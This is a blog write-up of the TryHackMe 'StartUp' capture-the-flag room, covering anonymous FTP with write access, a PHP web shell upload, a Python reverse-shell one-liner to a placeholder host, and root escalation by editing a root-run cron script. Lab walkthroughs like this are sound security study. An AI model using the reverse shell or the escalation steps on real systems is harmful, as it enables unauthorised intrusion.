Skip to content
HackAndStuff

Tryhackme - StartUp Room WriteUp

Tryhackme3 min read

Startup

StartUp is an easy category room developed by r1gormort1s . You can check out the room here.

As always , let's start with nmap.

nmap -sC -sV -v -oA nmap/initial IP

1PORT STATE SERVICE VERSION
221/tcp open ftp vsftpd 3.0.3
3| ftp-anon: Anonymous FTP login allowed (FTP code 230)
4| drwxrwxrwx 2 65534 65534 4096 Nov 12 04:53 ftp [NSE: writeable]
5| -rw-r--r-- 1 0 0 251631 Nov 12 04:02 important.jpg
6|_-rw-r--r-- 1 0 0 208 Nov 12 04:53 notice.txt
7| ftp-syst:
8| STAT:
9| FTP server status:
10| Connected to 10.9.51.118
11| Logged in as ftp
12| TYPE: ASCII
13| No session bandwidth limit
14| Session timeout in seconds is 300
15| Control connection is plain text
16| Data connections will be plain text
17| At session startup, client count was 3
18| vsFTPd 3.0.3 - secure, fast, stable
19|_End of status
2022/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
21| ssh-hostkey:
22| 2048 b9:a6:0b:84:1d:22:01:a4:01:30:48:43:61:2b:ab:94 (RSA)
23| 256 ec:13:25:8c:18:20:36:e6:ce:91:0e:16:26:eb:a2:be (ECDSA)
24|_ 256 a2:ff:2a:72:81:aa:a2:9f:55:a4:dc:92:23:e6:b4:3f (ED25519)
2580/tcp open http Apache httpd 2.4.18 ((Ubuntu))
26| http-methods:
27|_ Supported Methods: GET HEAD POST OPTIONS
28|_http-server-header: Apache/2.4.18 (Ubuntu)
29|_http-title: Maintenance
30Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

We have anonymous FTP login . So lets jump in and see what's there in the ftp dir.

ftp

The notice.txt file said

1Whoever is leaving these damn Among Us memes in this share, it IS NOT FUNNY. People downloading documents from our website will think we are a joke! Now I dont know who it is, but Maya is looking pretty sus.

Nothing interesting , we just have a name Maya for now. We also have a image , important.jpg . I ran strings , exiftool , did some stego on it , but in the end it's just a rabbithole . What I forgot is that the as nmap scan showed , we have write permissions in ftp . And if you have that , you shouldn't even bother trying lame stego stuff !

I got a simple php web shell from here and uploaded it to ftp dir. But we don't know yet , where on the server it got uploaded. So , I ran gobuster for some recon and we have a /files directory . So the ftp stuff is present on the server in /files/ftp dir. Accessing our webshell in browser , we have code execution.

webshell

Now, the first thing you do when you get code execution , Yup, get a reverse shell ! So , I ran a simple python one liner reverse shell and we have a SHELL !

1python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((<IP>,<PORT>));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'

To make it stable and full TTY , the usual stuff

1python -c 'import pty;pty.spawn("/bin/bash")'
2export TERM=xterm
3CTRL-Z to background it.
4stty raw -echo
5fg
6reset

And now we have a PROPER SHELL ! To confirm that , we run id and indeed , we are inside as www-data.

shell

Time for some recon. I manually looked for some interesting stuff in the system and in the root directory I got something interesting.

recipe

We now have the secret recipe. If we look closely , there is one more directory that is not usual , incidents . This contained a file which is outright suspicious as it is named suspicious.pcapng. So , this is a network capture file and as the directory name suggests , may be it is an incident log file . Opening it up with wireshark , we see a lot of HTTP and TCP traffic. Initially , I looked at exported HTTP objects but there was nothing interesting there . On following a TCP stream , I saw an interesting conversation.

wireshark

We have a password being used by some attacker in his attack . There is just one user in the system lennie , trying this password with lennie , we get a match . Now we are lennie . Looking in lennie's home directory , we have our user flag .

lennie

Time to be ROOT !

Okay , so if we see the contents of lennie's home directory we see a scripts directory owned by root which is interesting.

scripts

But weirdly , there is no SUID bit set , we don't have also write permissions for planner.sh , so let's leave it for now . Now , I used linpeas for enumeration , but it didn't find anything juicy . I was stuck at this point . The only thing we have is a root owned script . Let's focus on that . planner.sh is root owned , and it simply does two things.

  1. Puts the content of env variable LIST in startup_list.txt file . We can't do anything bad to it.
  2. Runs /etc/print.sh .

Let's look at the permissions of print.sh . Dude , we have write permissions. But even if we do some stuff with this , we dont have SUID , so we can't be root . OR CAN WE ? I decided to use pspy64 which is basically a process snooper that tells the processes running in the system

NO , its not same as running ps aux man , it even shows you privileged processes , try it , its COOL!)

pspy

And as I suspected , root is running this script .So , the classic bad stuff , we have write permissions for print.sh , put a dumb bash one liner reverse shell , andddd listen on your dumb netcat . After a minute , we have our root shell and our ROOT flag.

root

So this was overall a relatively easy tryhackme room with

misconfigured FTP , Insecurely placed incident logs and bad file permissions .

hacked

Hope you learned something new . Thanks for reading and as always

See ya later!

© 2021 by Jatin Malik. All rights reserved.